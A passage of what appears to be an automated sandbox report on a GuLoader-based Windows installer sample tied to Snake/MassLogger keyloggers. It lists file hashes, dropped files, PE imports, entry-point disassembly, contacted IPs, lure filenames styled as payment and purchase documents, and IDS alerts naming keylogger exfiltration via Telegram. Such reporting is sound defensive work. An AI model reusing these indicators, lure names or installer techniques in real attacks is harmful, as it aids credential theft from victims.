                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    ZFCKpFXpzx.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    ZFCKpFXpzx.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    jKqPSehspS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    37f463bf4616ecd445d4a1937da06e19Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 142.250.185.142
                                                                                    • 216.58.206.65
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 142.250.185.142
                                                                                    • 216.58.206.65
                                                                                    AM983ebb5F.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.142
                                                                                    • 216.58.206.65
                                                                                    av8XPPpdBc.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.142
                                                                                    • 216.58.206.65
                                                                                    QNuQ5e175D.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.142
                                                                                    • 216.58.206.65
                                                                                    7uY105UTJU.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.142
                                                                                    • 216.58.206.65
                                                                                    QNuQ5e175D.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.142
                                                                                    • 216.58.206.65
                                                                                    iwEnYIOol8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 142.250.185.142
                                                                                    • 216.58.206.65
                                                                                    Ntwph4urc1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 142.250.185.142
                                                                                    • 216.58.206.65
                                                                                    2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                                                                    • 142.250.185.142
                                                                                    • 216.58.206.65
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Users\user\AppData\Local\Temp\nsr675C.tmp\System.dllQg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        Process:C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):283232
                                                                                                        Entropy (8bit):7.730017738922209
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:DEUchWvPNFecwIuViaNU/C96KyyNWlGR5k0j9pr1+27Qe:A+V9wFi1/evN8mkY95s+d
                                                                                                        MD5:C67B0E2D4F1C2A939FEC3381DFD628FA
                                                                                                        SHA1:11C7759BA402EFA25458EA873297BD5082F92D50
                                                                                                        SHA-256:2351DC0F4567D15F232305787C947958A3F9CF37DA33AF328154A52AE0685661
                                                                                                        SHA-512:FACD9C26F0368D296C808337EA96C475A7E3090BDE12E05A3B3F1A02C895416FE69D030E5966012879D1996CAFA4CA2F248B769C1155D4A07D18B39F63550696
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:.....................?.........P.LL.....55..........[.......h...OOO.....yyyy..6...h.NNNN..............11...............oo................j........<............................WWWW..qqq...........................q..........................1..............@.@....X....................~......................#..........Z....}.........&&.......o.........................K.*........x.......k...;;;;;.........................O....K.........2..............................qqq.......W....XX...............bb.........-...............z..0000000.......vv....A..................zzzz.........w...._....666..NN..^..]]]]....|||||...HHHH..........```.-.....---.......................4.!!......[..NNN.`...............;............y.............[[[[.........WWW......W...=...................,,,,....................................hh...................e.//............qq.AA...L.....g............................TTT.????.sssss...................nn..........\.._...>...........W.***............................Q....||....
                                                                                                        Process:C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):108946
                                                                                                        Entropy (8bit):4.606837605675962
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:m2spe3sJV6pGqNPJ1yjuFaWo2SD3ISEMvV5CKk2nYBPbns2WK:VswcypjJ1yyar2A3ISvLCeYlTWK
                                                                                                        MD5:5109F4D21F8B3396D0D55CFDD2B86A47
                                                                                                        SHA1:554DA61E02250B5D737A5BFC4BE0BA882429E08C
                                                                                                        SHA-256:71ADDB58748EA63FE76E549D111ED2B67819184F6D18A0FBF68D070113409143
                                                                                                        SHA-512:3FCD5627A14414C6251E49E61419A62D0CB9E581C7E9514802DA666295E6798EFA5DBD1E270060A74778CC3FB64048536285451405D3525876F2C97AF90F55FA
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:..!.............&.........y..........6666...QQQQ......CC....c...LL.........................KK.>>>>.........i...........)..............||||.......ss.]........dd...(.x.................))...{.s.qq.____..................M.......qqq..EEEEEEE.......SS..........V...........\........XXXX.......}..b.........!..........................SS.................%.ccc..dd.........55....FFFF... .QQQQ...................[........O..............ff....]]..YYYY..............................<..........................E.X...vvvvvv..................B..........3..............___....................uu............[[.............e.........H............C...R.2............jj.6.....K...................................~~~...............ttt...........\.KK...aa........2.......................7.KKK.....7...........j.!!!........hhh...........n.p.......................ttt..o...............V.........FFFFF.................-...oooo...........pp..m...._.cccccc.%.}}.......(.............bbb.......;...<...._.........vv.............
                                                                                                        Process:C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):56641
                                                                                                        Entropy (8bit):1.2318917163845036
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                        MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                        SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                        SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                        SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................
                                                                                                        Process:C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):345
                                                                                                        Entropy (8bit):4.241929841155785
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                        MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                        SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                        SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                        SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                        Process:C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                        Category:dropped
                                                                                                        Size (bytes):210366
                                                                                                        Entropy (8bit):1.240975322465592
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                        MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                        SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                        SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                        SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................
                                                                                                        Process:C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):363811
                                                                                                        Entropy (8bit):1.2512349423386382
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                        MD5:BFEA15C03AB295424981A73637A19491
                                                                                                        SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                        SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                        SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                        Malicious:false
                                                                                                        Preview:...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............
                                                                                                        Process:C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11776
                                                                                                        Entropy (8bit):5.655335921632966
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                        MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                        SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                        SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                        SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: Qg79mitNvD.exe, Detection: malicious, Browse
                                                                                                        • Filename: FILHKLtCw0.exe, Detection: malicious, Browse
                                                                                                        • Filename: ppISxhDcpF.exe, Detection: malicious, Browse
                                                                                                        • Filename: m0CZ8H4jfl.exe, Detection: malicious, Browse
                                                                                                        • Filename: PURCHASE ORDER TRC-090971819130-24_pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: RFQ December-January Forcast and TCL.exe, Detection: malicious, Browse
                                                                                                        • Filename: PAYMENT ADVICE TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: PURCHASE ORDER TRC-0909718-24_pdf.exe, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1174
                                                                                                        Entropy (8bit):3.253276889214852
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:8wl0IsXyEKW2je/tz0/CSL6/cBnwgXl341DEDeG41DEDWqMsQ1olfW+kjcmAazpV:8HlKPjeWLrFPjPKq4izZMzrJpqy
                                                                                                        MD5:993E6DE930B121836F36DB5DC496A712
                                                                                                        SHA1:C607F3DE353871D3E79B7EEDB0840A3FFC7C4827
                                                                                                        SHA-256:4CE587CC1873D0A0833A1FB43924301059AE84347023F811BA237E1E7E45EC65
                                                                                                        SHA-512:FD52837A4BA26BA175B6FC005CC5D4F48BA8DB53A6BDE685D56EFE24B313A4D6837CBC39FB77A4767EE0B7039148DFF0E988189CA88BE6A58556C547C2F2A8D7
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F........................................................k....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.Y.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.\.U.n.l.a.t.t.i.c.e.d.............w.............
                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                        Entropy (8bit):7.963561852977546
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:14lVOjBoI2.exe
                                                                                                        File size:472'339 bytes
                                                                                                        MD5:ebf8a74191898b4a5cd58ffe2035c1ee
                                                                                                        SHA1:d73223724a73b0f7c3d0889247c50f97818ca4c0
                                                                                                        SHA256:ad3b51ce98d8e69775168649d8b4ffbee80c182b3fdb6cfa7f964548c70e9e75
                                                                                                        SHA512:23e3d0b6334cd277ba3d961d65e86e8af162730189328698e34a59c4ea627ffe20ebfc7b051d1a210892acc0390faca776e9d0d7243371e0a06047aafb39f9ab
                                                                                                        SSDEEP:12288:I5AB4N/30vZBGn++dR3vkbuemnSku7Jj1JK8s5FEeKA:ZB4N/+BGnn35xSku7Jj1Jice9
                                                                                                        TLSH:71A423046214F0CBE0B25B364C6727AA6BBE731152B49F1787A4194A3C31BE5CD7E9E8
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                                                                                        Icon Hash:3d2e0f95332b3399
                                                                                                        Entrypoint:0x4032a0
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                                        Instruction
                                                                                                        sub esp, 000002D4h
                                                                                                        push ebp
                                                                                                        push esi
                                                                                                        push 00000020h
                                                                                                        xor ebp, ebp
                                                                                                        pop esi
                                                                                                        mov dword ptr [esp+0Ch], ebp
                                                                                                        push 00008001h
                                                                                                        mov dword ptr [esp+0Ch], 0040A300h
                                                                                                        mov dword ptr [esp+18h], ebp
                                                                                                        call dword ptr [004080B0h]
                                                                                                        call dword ptr [004080ACh]
                                                                                                        cmp ax, 00000006h
                                                                                                        je 00007F08D0DBB0E3h
                                                                                                        push ebp
                                                                                                        call 00007F08D0DBE226h
                                                                                                        cmp eax, ebp
                                                                                                        je 00007F08D0DBB0D9h
                                                                                                        push 00000C00h
                                                                                                        call eax
                                                                                                        push ebx
                                                                                                        push edi
                                                                                                        push 0040A2F4h
                                                                                                        call 00007F08D0DBE1A3h
                                                                                                        push 0040A2ECh
                                                                                                        call 00007F08D0DBE199h
                                                                                                        push 0040A2E0h
                                                                                                        call 00007F08D0DBE18Fh
                                                                                                        push 00000009h
                                                                                                        call 00007F08D0DBE1F4h
                                                                                                        push 00000007h
                                                                                                        call 00007F08D0DBE1EDh
                                                                                                        mov dword ptr [00434F04h], eax
                                                                                                        call dword ptr [00408044h]
                                                                                                        push ebp
                                                                                                        call dword ptr [004082A8h]
                                                                                                        mov dword ptr [00434FB8h], eax
                                                                                                        push ebp
                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                        push 000002B4h
                                                                                                        push eax
                                                                                                        push ebp
                                                                                                        push 0042B228h
                                                                                                        call dword ptr [0040818Ch]
                                                                                                        push 0040A2C8h
                                                                                                        push 00433F00h
                                                                                                        call 00007F08D0DBDDDAh
                                                                                                        call dword ptr [004080A8h]
                                                                                                        mov ebx, 0043F000h
                                                                                                        push eax
                                                                                                        push ebx
                                                                                                        call 00007F08D0DBDDC8h
                                                                                                        push ebp
                                                                                                        call dword ptr [00408178h]
                                                                                                        Programming Language:
                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x11e0.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .ndata0x350000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .rsrc0x5d0000x11e00x120020639f4e7c421f5379e2fb9ea4a1530dFalse0.3684895833333333data4.485045860065118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_BITMAP0x5d2680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                        RT_ICON0x5d5d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                        RT_DIALOG0x5d8b80x144dataEnglishUnited States0.5216049382716049
                                                                                                        RT_DIALOG0x5da000x13cdataEnglishUnited States0.5506329113924051
                                                                                                        RT_DIALOG0x5db400x100dataEnglishUnited States0.5234375
                                                                                                        RT_DIALOG0x5dc400x11cdataEnglishUnited States0.6056338028169014
                                                                                                        RT_DIALOG0x5dd600xc4dataEnglishUnited States0.5918367346938775
                                                                                                        RT_DIALOG0x5de280x60dataEnglishUnited States0.7291666666666666
                                                                                                        RT_GROUP_ICON0x5de880x14dataEnglishUnited States1.2
                                                                                                        RT_MANIFEST0x5dea00x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                        DLLImport
                                                                                                        KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                        USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                        ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        EnglishUnited States
                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2025-01-11T07:20:01.715417+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949709142.250.185.142443TCP
                                                                                                        2025-01-11T07:20:15.627680+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949711132.226.247.7380TCP
                                                                                                        2025-01-11T07:20:25.191376+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949711132.226.247.7380TCP
                                                                                                        2025-01-11T07:20:27.737418+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949711132.226.247.7380TCP
                                                                                                        2025-01-11T07:20:28.407804+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949713149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:28.673274+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949713149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:31.424576+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949714132.226.247.7380TCP
                                                                                                        2025-01-11T07:20:32.009754+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949715149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:32.352743+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949715149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:33.112153+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949716132.226.247.7380TCP
                                                                                                        2025-01-11T07:20:33.688144+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949717149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:33.907815+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949717149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:36.194186+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949719149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:36.397639+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949719149.154.167.220443TCP
